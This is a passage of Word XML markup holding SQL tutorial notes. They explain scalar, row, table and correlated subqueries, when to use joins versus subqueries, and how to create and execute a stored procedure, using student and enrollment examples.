          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scalar Subquery</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C547EE6"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Returns a single value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4095039D"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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E9E30B"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column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B7F1BE"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table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C1CA36"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column = (SELECT value FROM table WHERE condition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53773855"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4C3ADB7C"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0902F8A5"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students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52098830"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student_id = (SELECT student_id FROM enrollments WHERE course_id = 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BA86C2" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Row Subquery</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D09AD7"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Returns a single row with multiple columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D10631"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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BEC569"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column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A82257"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FROM table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3A2B3C"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(column1, column2) = (SELECT column1, column2 FROM table WHERE condition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31998F83"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4735224"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67231D38"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students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4924EDFF"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(student_id, course_id) = (SELECT student_id, course_id FROM enrollments WHERE course_id = 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB24C2" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table Subquery (Multi-row Subquery)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144DE725"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Returns multiple rows and columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA9208E"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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA87BD8"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column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A3EB6E"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table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328BAC42"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column IN (SELECT column FROM table WHERE condition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335C3CE4"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EA17D25"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AD732"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students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762E826F"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student_id IN (SELECT student_id FROM enrollments WHERE course_id = 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EE477" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Correlated Subquery</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9FAB14"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References columns from the outer query. Executes once for each row processed by the outer query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A731639"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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9E8788"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column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC23C48"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table1 outer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F61C2"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EXISTS (SELECT 1 FROM table2 inner WHERE inner.column = outer.column);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A633E1" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36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437E7EEC"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D7FF98"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students s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07755E96" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D2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EXISTS (SELECT 1 FROM enrollments e WHERE e.student_id = s.student_id AND e.course_id = 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBA5757" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Comparison and Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B57CF2" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are generally used to combine rows from multiple tables based on a related column, providing a way to fetch data that spans multiple tables in a single query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74872FAB" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Subqueries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are useful for complex queries where you need to perform operations that depend on the results of another query, such as filtering or aggregating data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013CB893" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Choosing Between Joins and Subqueries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11817FD9" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to retrieve and combine data from multiple tables and when performance is a concern, as joins are often more efficient for combining large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30127443" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>subqueries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to perform additional filtering, calculations, or when working with hierarchical data. Subqueries can be simpler for certain types of logic but may be less performant for very large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F36D33" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6303A0" w14:textId="1DB0FFB1" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc178383304"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are stored procedures and triggers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="61CB934A"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stored procedures and triggers are both powerful features in relational databases that help automate and manage database operations, but they serve different purposes and are used in different scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DE71CC" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stored Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C078E0"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 stored procedure is a precompiled collection of one or more SQL statements that are executed together. It is stored in the database and can be called and executed by applications or other database objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9F415"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Key Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414580C7" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encapsulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Encapsulates logic for complex operations, making it reusable and modular.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226A2025" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Stored procedures can improve performance as they are precompiled and optimized by the database engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5FFAB7" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: They can help enhance security by controlling access to data and operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69221F10"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Creation and Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E87D2" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creating a Stored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BEDEDA"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PROCEDURE procedure_name (parameters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09783681"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF9627"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC04537"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SQL statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442C09CD"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6880C780"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07F1D562"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PROCEDURE GetStudentInfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6393C426"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@StudentID INT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D8E4CF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CEAE78"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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49080031"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SELECT * FROM Students WHERE StudentID = @StudentID;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC4665"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33256E6E" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Executing a Stored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABADACC"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EXEC procedure_name [parameters];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D68BEEB"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63110290"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EXEC GetStudentInfo @StudentID = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9C3172"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Common Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6921A1CD" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performing complex data manipulations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4928F0" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementing business logic in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B45581" w14:textId="77777777" w:rsidR="006F6EFA" w:rsidRPr="00DA2F32" w:rsidRDefault="006F6EFA" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
